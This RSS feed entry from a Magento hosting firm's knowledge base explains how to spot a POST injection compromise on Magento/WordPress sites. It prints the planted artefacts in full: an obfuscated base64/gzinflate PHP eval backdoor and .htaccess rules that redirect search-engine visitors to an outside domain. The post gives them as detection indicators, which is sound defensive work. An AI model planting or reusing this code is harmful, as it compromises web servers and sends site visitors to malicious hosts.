Magento design, development and suport :: sonassi » dVFda8IwFH0X/ http://www.sonassi.com Latest press releases, tutorials and thoughts on the world can be found here Wed, 18 Jan 2012 14:06:23 +0000 en hourly 1 http://wordpress.org/?v=3.0.4 Magento/WordPress injection vulnerability http://www.sonassi.com/knowledge-base/magentowordpress-injection-vulnerability/ http://www.sonassi.com/knowledge-base/magentowordpress-injection-vulnerability/#comments Wed, 13 Jan 2010 19:05:53 +0000 Benjamin http://www.sonassi.com/?p=1217 Continue reading ]]> We had been recently contacted by an agency (non-Sonassi Hosting) keen to resolve a Magento redirect on checkout bug. We quickly realised after inspection that the site had been subject to an all-too-common POST injection vulnerability. Discussing ultimate prevention is beyond the scope of this post, but you can check for tell tale signs.

If you’re checkout isn’t operating as it should and you have checked out our Magento checkout redirect guide, then your issue could be this.

Inspect your index.php|index.* files and look for:

<?php eval(gzinflate(base64_decode('dVFda8IwFH0X/A+XEpaGldj6AXNSpg9FXybD1b1MKV2b2GBNStpOxth/X+I+3MOEhOTec8/NuSdoXTM92zHZQAh1oxtVqiPTLkoeo9VTtHrGizh+SNYmSmbzaBnjLZl0O4K7prhStYt+G3iAd0rtSoYJKA3f+F/4LS2UuogeankRK8WraUu6nfduBwBpIxbjib0bJYiHU16rbK8qJl0cjEc0GPs0GND+YIS9G99DzCztBT6BVOYw5VXbGOncA2cexdArhdyLpickrYrqLleHVMjQAQqtLpnMVM7OhjhfZ7Kc3UfOlpgi56o1UlMr9RLpHxctEWy6F1B/ozdyoermFg6+ZlRIm7DbsUMDHAtRMhdQaQbnmqX5SXzg94eEWDtoaLCTH1Oelao2T3NyilEV/vyU9pxz2wmwrFBQty8GthiqroeW8vEJ'))); ?>

Inspect your .htaccess file and look for:

AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*new.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://you-search.in/in.cgi?4&parameter=ku [R,L]

If you find either of these entries, be sure to remove them immediately. Our advice would be to perform an security audit to review all FTP/SSH/Admin passwords along with solving the source injection issue by upgrading to the latest version of Magento/Wordpress.

There is a nice article on hacking Magento at nicollet.net.

]]> http://www.sonassi.com/knowledge-base/magentowordpress-injection-vulnerability/feed/ 1